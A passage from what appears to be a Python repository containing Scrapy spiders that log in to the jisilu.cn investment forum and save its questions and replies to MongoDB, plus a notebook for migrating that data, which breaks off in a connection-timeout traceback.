'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 63 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 64 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 65 | 'Upgrade-Insecure-Requests': '1', 66 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 67 | 68 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True) 69 | 70 | def login(self, response): 71 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 72 | username = decoder(config.jsl_user) 73 | jsl_password = decoder(config.jsl_password) 74 | data = { 75 | 'return_url': 'https://www.jisilu.cn/', 76 | 'user_name': username, 77 | 'password': jsl_password, 78 | 'net_auto_login': '1', 79 | '_post_type': 'ajax', 80 | } 81 | 82 | yield FormRequest( 83 | url=url, 84 | headers=self.headers, 85 | formdata=data, 86 | callback=self.parse, 87 | dont_filter=True 88 | ) 89 | 90 | def parse(self, response, **kwargs): 91 | # print('登录后', response.text) 92 | focus_url = self.URL.format(self.start_page) 93 | 94 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True, 95 | meta={'page': self.start_page}) 96 | 97 | def parse_page(self, response): 98 | 99 | current_page = response.meta['page'] 100 | 101 | nodes = response.xpath('//div[@class="aw-question-list"]/div') 102 | last_resp_date = None 103 | 104 | for node in nodes: 105 | 106 | each_url = node.xpath('.//h4/a/@href').extract_first() 107 | try: 108 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip() 109 | # '回复 • 2018-12-10 09:49 • 46335 次浏览' 110 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1) 111 | except: 112 | logging.error('failed to find date') 113 | continue 114 | else: 115 | # 访问详情 116 | # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC' 117 | # '"https://www.jisilu.cn/question/336326"' 118 | if re.search('www.jisilu.cn/question/\d+', each_url): 119 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1) 120 | 121 | # if self.question_exist(question_id): 122 | # continue 123 | 124 | # print(f'{question_id}帖子不存在,下载') 125 | 126 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 127 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers, 128 | callback=self.check_detail, 129 | meta={'last_resp_date': last_resp_date, 'question_id': question_id}) 130 | 131 | # 继续翻页 132 | # print(last_resp_date) 133 | if last_resp_date is not None and isinstance(last_resp_date,str): 134 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 135 | 136 | if last_resp_date is not None and (self.last_week < last_resp_date): 137 | # logging.info('last_resp_date ===== {}'.format(last_resp_date)) 138 | 139 | current_page += 1 140 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page, 141 | meta={'page': current_page}) 142 | 143 | def question_exist(self,_id): 144 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False 145 | 146 | def compose_content(self,content_list): 147 | string = "" 148 | for line in content_list: 149 | line = line.strip() 150 | if len(line)>0: 151 | string+=line+'\n' 152 | return string 153 | 154 | def check_detail(self, response): 155 | 156 | if '您访问的资源需要购买会员' in response.text: 157 | return 158 | 159 | question_id = response.meta['question_id'] 160 | last_resp_date=response.meta['last_resp_date'] 161 | more_page = response.xpath('//div[@class="pagination pull-right"]') 162 | 163 | item = JslItem() 164 | item['last_resp_date'] = last_resp_date 165 | 166 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 167 | item['question_id'] = question_id 168 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]') 169 | 170 | content_html = content_node.extract_first() # 获取到源码 171 | 172 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 173 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 174 | # try: 175 | # content = ret[0].strip() 176 | # except Exception as e: 177 | # # logging.error(e) 178 | # content = None 179 | 180 | content_list = content_node.xpath('string(.)').extract() 181 | content_str = self.compose_content(content_list) 182 | 183 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 184 | # 'aw-question-detail-meta' 185 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 186 | 187 | url = response.url 188 | 189 | # 添加发起人 190 | try: 191 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 192 | except Exception as e: 193 | # logging.error(e) 194 | item['creator'] = None 195 | 196 | item['title'] = title.strip() 197 | item['content'] = content_str 198 | item['content_html'] = content_html 199 | 200 | try: 201 | item['resp_no'] = int(resp_no) 202 | except Exception as e: 203 | # logging.warning('没有回复') 204 | item['resp_no'] = 0 205 | if createTime is None: 206 | # print(title) 207 | # print(content) 208 | return 209 | item['createTime'] = createTime.replace('发表时间 ', '') 210 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 211 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','') 212 | 213 | # 多页 214 | if more_page: 215 | 216 | total_resp_no = item['resp_no'] 217 | total_page = total_resp_no // 100 + 1 218 | item['resp'] = [] 219 | 220 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 221 | callback=self.multi_page_detail, 222 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 223 | 'item': item}) 224 | 225 | else: 226 | 227 | resp_ = [] 228 | # 回复内容 229 | for index, reply in enumerate( 230 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 231 | replay_user = reply.xpath( 232 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 233 | rep_content = reply.xpath( 234 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 235 | 'string(.)').extract_first() 236 | # rep_content = '\n'.join(rep_content) 237 | 238 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 239 | if agree is None: 240 | agree = 0 241 | else: 242 | agree = int(agree) 243 | 244 | resp_.append( 245 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 246 | 247 | item['resp'] = resp_ 248 | item['only_add']=True 249 | 250 | yield item 251 | 252 | # 详情页 253 | def multi_page_detail(self, response): 254 | 255 | current_page = response.meta['page'] 256 | item = response.meta['item'] 257 | total_page = response.meta['total_page'] 258 | question_id = response.meta['question_id'] 259 | 260 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 261 | 262 | for index, reply in enumerate( 263 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 264 | replay_user = reply.xpath( 265 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 266 | rep_content = reply.xpath( 267 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 268 | 'string(.)').extract_first() 269 | if rep_content: 270 | rep_content = rep_content.strip() 271 | # rep_content = '\n'.join(rep_content) 272 | 273 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 274 | if agree is None: 275 | agree = 0 276 | else: 277 | agree = int(agree) 278 | 279 | item['resp'].append( 280 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 281 | 282 | current_page += 1 283 | # item['resp_no']=len(item['resp']) 284 | if current_page <= total_page: 285 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 286 | callback=self.multi_page_detail, 287 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 288 | 'item': item}) 289 | else: 290 | item['only_add']=True 291 | yield item 292 | -------------------------------------------------------------------------------- /jsl/spiders/questions.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import re 4 | import scrapy 5 | from scrapy import Request, FormRequest 6 | from jsl.items import JslItem 7 | from jsl import config 8 | import logging 9 | import pymongo 10 | 11 | # 遍历所有questions id 看从哪里开始 12 | class QuestionSpider(scrapy.Spider): 13 | name = 'questions' 14 | 15 | headers = { 16 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 17 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 18 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 19 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 20 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 21 | 'Referer': 'https://www.jisilu.cn/login/', 22 | 'Accept-Encoding': 'gzip,deflate,br', 23 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 24 | } 25 | 26 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期 27 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期 28 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 29 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 30 | 31 | # self.doc = 32 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 33 | db = pymongo.MongoClient(connect_uri) 34 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 35 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test'] 36 | collection = db['db_parker'][config.doc_name] 37 | 38 | def start_requests(self): 39 | login_url = 'https://www.jisilu.cn/login/' 40 | headers = { 41 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 42 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 43 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 44 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 45 | 'Upgrade-Insecure-Requests': '1', 46 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 47 | 48 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True) 49 | 50 | def login(self, response): 51 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 52 | data = { 53 | 'return_url': 'https://www.jisilu.cn/', 54 | 'user_name': config.jsl_user, 55 | 'password': config.jsl_password, 56 | 'net_auto_login': '1', 57 | '_post_type': 'ajax', 58 | } 59 | 60 | yield FormRequest( 61 | url=url, 62 | headers=self.headers, 63 | formdata=data, 64 | callback=self.parse, 65 | ) 66 | 67 | def question_exist(self,_id): 68 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False 69 | 70 | def parse(self, response,**kwargs): 71 | lastest_id = config.LASTEST_ID # 72 | 73 | for i in range(lastest_id + 5000, 1, -1): 74 | if not self.question_exist(lastest_id): 75 | focus_url = 'https://www.jisilu.cn/question/{}'.format(i) 76 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': str(i)}) 77 | def compose_content(self,content_list): 78 | string = "" 79 | for line in content_list: 80 | line = line.strip() 81 | if len(line)>0: 82 | string+=line+'\n' 83 | return string 84 | 85 | def parse_item(self, response): 86 | item = JslItem() 87 | question_id = response.meta['question_id'] 88 | 89 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 90 | 91 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 92 | 93 | # if s: 94 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 95 | # else: 96 | # ret = None 97 | 98 | # try: 99 | # content = ret[0].strip() 100 | # except: 101 | # content = None 102 | 103 | 104 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]') 105 | 106 | content_html = content_node.extract_first() # 获取到源码 107 | 108 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 109 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 110 | # try: 111 | # content = ret[0].strip() 112 | # except Exception as e: 113 | # # logging.error(e) 114 | # content = None 115 | 116 | content_list = content_node.xpath('string(.)').extract() 117 | content_str = self.compose_content(content_list) 118 | 119 | 120 | 121 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 122 | if createTime is None: 123 | return 124 | 125 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 126 | 127 | url = response.url 128 | 129 | # 添加发起人 130 | try: 131 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 132 | except Exception as e: 133 | print(e) 134 | item['creator'] = None 135 | 136 | 137 | try: 138 | title = title.strip() 139 | except Exception as e: 140 | title = None 141 | 142 | item['content'] = content_str 143 | 144 | item['content_html'] = content_html 145 | 146 | try: 147 | item['resp_no'] = int(resp_no) 148 | except Exception as e: 149 | # logging.warning(e) 150 | # logging.warning('没有回复') 151 | item['resp_no'] = 0 152 | 153 | item['title'] = title 154 | item['question_id'] = question_id 155 | 156 | createTime = createTime.strip() 157 | 158 | if not re.search('^\d', createTime): 159 | createTime = createTime.replace('发表时间 ', '') 160 | # createTime = None 161 | # self.logger.error('创建日期有误:{}'.format(url)) 162 | if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime): 163 | self.logger.error('创建日期有误:{}'.format(url)) 164 | self.logger.error(createTime) 165 | createTime = None 166 | # 167 | item['createTime'] = createTime 168 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','') 169 | 170 | resp = [] 171 | last_resp_date = None 172 | for index, reply in enumerate( 173 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 174 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 175 | 176 | if last_resp_date is None: 177 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first() 178 | 179 | rep_content = reply.xpath( 180 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first() 181 | # print rep_content 182 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 183 | try: 184 | int(agree) 185 | except: 186 | agree = 0 187 | 188 | resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]}) 189 | # item['html'] = response.text 190 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 191 | 192 | item['resp'] = resp 193 | item['last_resp_date'] = last_resp_date 194 | item['only_add'] = True 195 | yield item 196 | 197 | def check_detail(self, response): 198 | 199 | if '您访问的资源需要购买会员' in response.text: 200 | return 201 | 202 | question_id = response.meta['question_id'] 203 | more_page = response.xpath('//div[@class="pagination pull-right"]') 204 | 205 | item = JslItem() 206 | last_resp_date = None # 后期更新 207 | 208 | item['last_resp_date'] = last_resp_date 209 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 210 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 211 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 212 | item['question_id'] = question_id 213 | 214 | try: 215 | content = ret[0].strip() 216 | except Exception as e: 217 | logging.error(e) 218 | content = None 219 | 220 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 221 | # 'aw-question-detail-meta' 222 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 223 | 224 | url = response.url 225 | 226 | # 添加发起人 227 | try: 228 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 229 | except Exception as e: 230 | logging.error(e) 231 | item['creator'] = None 232 | 233 | item['title'] = title.strip() 234 | item['content'] = content 235 | try: 236 | item['resp_no'] = int(resp_no) 237 | except Exception as e: 238 | # logging.warning('没有回复') 239 | item['resp_no'] = 0 240 | 241 | item['createTime'] = createTime.replace('发表时间 ', '') 242 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 243 | item['url'] = url.strip() 244 | # item['html'] = response.text 245 | item['last_resp_date'] = response.meta['last_resp_date'] 246 | 247 | # 多页 248 | if more_page: 249 | 250 | total_resp_no = item['resp_no'] 251 | total_page = total_resp_no // 100 + 1 252 | item['resp'] = [] 253 | 254 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 255 | callback=self.multi_page_detail, 256 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 257 | 'item': item}) 258 | 259 | else: 260 | 261 | resp_ = [] 262 | # 回复内容 263 | for index, reply in enumerate( 264 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 265 | replay_user = reply.xpath( 266 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 267 | rep_content = reply.xpath( 268 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 269 | 'string(.)').extract_first() 270 | # rep_content = '\n'.join(rep_content) 271 | 272 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 273 | if agree is None: 274 | agree = 0 275 | else: 276 | agree = int(agree) 277 | 278 | resp_.append( 279 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 280 | 281 | item['resp'] = resp_ 282 | 283 | yield item 284 | 285 | # 详情页 286 | def multi_page_detail(self, response): 287 | 288 | current_page = response.meta['page'] 289 | item = response.meta['item'] 290 | total_page = response.meta['total_page'] 291 | question_id = response.meta['question_id'] 292 | 293 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 294 | 295 | for index, reply in enumerate( 296 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 297 | replay_user = reply.xpath( 298 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 299 | rep_content = reply.xpath( 300 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 301 | 'string(.)').extract_first() 302 | if rep_content: 303 | rep_content = rep_content.strip() 304 | # rep_content = '\n'.join(rep_content) 305 | 306 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 307 | if agree is None: 308 | agree = 0 309 | else: 310 | agree = int(agree) 311 | 312 | item['resp'].append( 313 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 314 | 315 | current_page += 1 316 | 317 | if current_page <= total_page: 318 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 319 | callback=self.multi_page_detail, 320 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 321 | 'item': item}) 322 | else: 323 | yield item 324 | -------------------------------------------------------------------------------- /数据迁移.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 30, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import pymongo\n", 10 | "from elasticsearch import Elasticsearch" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": 31, 16 | "metadata": {}, 17 | "outputs": [], 18 | "source": [ 19 | "db = pymongo.MongoClient('10.18.6.46',27001)" 20 | ] 21 | }, 22 | { 23 | "cell_type": "code", 24 | "execution_count": 32, 25 | "metadata": {}, 26 | "outputs": [], 27 | "source": [ 28 | "es = Elasticsearch(['10.18.6.102:9200'])" 29 | ] 30 | }, 31 | { 32 | "cell_type": "code", 33 | "execution_count": 11, 34 | "metadata": {}, 35 | "outputs": [], 36 | "source": [ 37 | "doc = db['db_parker']['jsl']" 38 | ] 39 | }, 40 | { 41 | "cell_type": "code", 42 | "execution_count": 12, 43 | "metadata": {}, 44 | "outputs": [], 45 | "source": [ 46 | "item = doc.find_one()" 47 | ] 48 | }, 49 | { 50 | "cell_type": "code", 51 | "execution_count": 13, 52 | "metadata": { 53 | "scrolled": true 54 | }, 55 | "outputs": [ 56 | { 57 | "data": { 58 | "text/plain": [ 59 | "{'_id': ObjectId('5c249f29c4c05d4ba4bfa49d'),\n", 60 | " 'creator': 'greatbear',\n", 61 | " 'title': '各位研究技术指标有什么心得体会?',\n", 62 | " 'content': '各位研究技术指标多久了?研究这东西,能帮炒股赚钱么:)',\n", 63 | " 'resp_no': 11,\n", 64 | " 'createTime': '2018-12-14 08:38',\n", 65 | " 'crawlTime': '2019-03-16 09:54:43',\n", 66 | " 'url': 'https://www.jisilu.cn/question/297952',\n", 67 | " 'resp': [{'seeker24680_0': ['0', '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。']},\n", 68 | " {'joyfulli_1': ['0',\n", 69 | " '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了']},\n", 70 | " {'老高0813_2': ['0', '基本没卵用']},\n", 71 | " {'z383788052_3': ['0', '从来只看指标,只看k']},\n", 72 | " {'花园小琴_4': ['0', '看图形,一般只看低买高卖,但事后后悔,赚少了']},\n", 73 | " {'风险搬运工_5': ['0', '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。']},\n", 74 | " {'smag_6': ['0', '基本不看指标,静下心感受波动,在波动中下注。。。']},\n", 75 | " {'海浪头头_7': ['0', '同意美棠子的看法']},\n", 76 | " {'jsl0900_8': ['0', '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题']},\n", 77 | " {'美棠子_9': ['4', '只是个辅助工具,基本面是核心,切不可颠倒主次。']},\n", 78 | " {'蔓越橘_10': ['0', '用于T一下可以,其他就算了吧。']}],\n", 79 | " 'last_resp_date': '2018-12-14 10:14'}" 80 | ] 81 | }, 82 | "execution_count": 13, 83 | "metadata": {}, 84 | "output_type": "execute_result" 85 | } 86 | ], 87 | "source": [ 88 | "item" 89 | ] 90 | }, 91 | { 92 | "cell_type": "code", 93 | "execution_count": 14, 94 | "metadata": {}, 95 | "outputs": [], 96 | "source": [ 97 | "keys= item.keys()" 98 | ] 99 | }, 100 | { 101 | "cell_type": "code", 102 | "execution_count": 15, 103 | "metadata": {}, 104 | "outputs": [ 105 | { 106 | "data": { 107 | "text/plain": [ 108 | "dict_keys(['_id', 'creator', 'title', 'content', 'resp_no', 'createTime', 'crawlTime', 'url', 'resp', 'last_resp_date'])" 109 | ] 110 | }, 111 | "execution_count": 15, 112 | "metadata": {}, 113 | "output_type": "execute_result" 114 | } 115 | ], 116 | "source": [ 117 | "keys" 118 | ] 119 | }, 120 | { 121 | "cell_type": "code", 122 | "execution_count": 34, 123 | "metadata": {}, 124 | "outputs": [], 125 | "source": [ 126 | "save_db = db['db_parker']['jsl_note']" 127 | ] 128 | }, 129 | { 130 | "cell_type": "code", 131 | "execution_count": 24, 132 | "metadata": {}, 133 | "outputs": [], 134 | "source": [ 135 | "import datetime" 136 | ] 137 | }, 138 | { 139 | "cell_type": "code", 140 | "execution_count": 37, 141 | "metadata": { 142 | "scrolled": true 143 | }, 144 | "outputs": [ 145 | { 146 | "ename": "AutoReconnect", 147 | "evalue": "10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。", 148 | "output_type": "error", 149 | "traceback": [ 150 | "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", 151 | "\u001b[1;31mTimeoutError\u001b[0m Traceback (most recent call last)", 152 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 609\u001b[0m return receive_message(self.sock, request_id,\n\u001b[1;32m--> 610\u001b[1;33m self.max_message_size)\n\u001b[0m\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 153 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(sock, request_id, max_message_size)\u001b[0m\n\u001b[0;32m 172\u001b[0m length, _, response_to, op_code = _UNPACK_HEADER(\n\u001b[1;32m--> 173\u001b[1;33m _receive_data_on_socket(sock, 16))\n\u001b[0m\u001b[0;32m 174\u001b[0m \u001b[1;31m# No request_id for exhaust cursor \"getMore\".\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 154 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36m_receive_data_on_socket\u001b[1;34m(sock, length)\u001b[0m\n\u001b[0;32m 231\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 232\u001b[1;33m \u001b[0mchunk_length\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mrecv_into\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmv\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mbytes_read\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 233\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mIOError\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mOSError\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 155 | "\u001b[1;31mTimeoutError\u001b[0m: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。", 156 | "\nDuring handling of the above exception, another exception occurred:\n", 157 | "\u001b[1;31mAutoReconnect\u001b[0m Traceback (most recent call last)", 158 | "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m()\u001b[0m\n\u001b[0;32m 1\u001b[0m \u001b[0murl_set\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mset\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[1;32mfor\u001b[0m \u001b[0mitem\u001b[0m \u001b[1;32min\u001b[0m \u001b[0mdoc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mfind\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 3\u001b[0m \u001b[0mcreator\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'creator'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 4\u001b[0m \u001b[0mtitle\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'title'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5\u001b[0m \u001b[0mcontent\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'content'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 159 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36mnext\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1187\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__empty\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1188\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mStopIteration\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1189\u001b[1;33m \u001b[1;32mif\u001b[0m 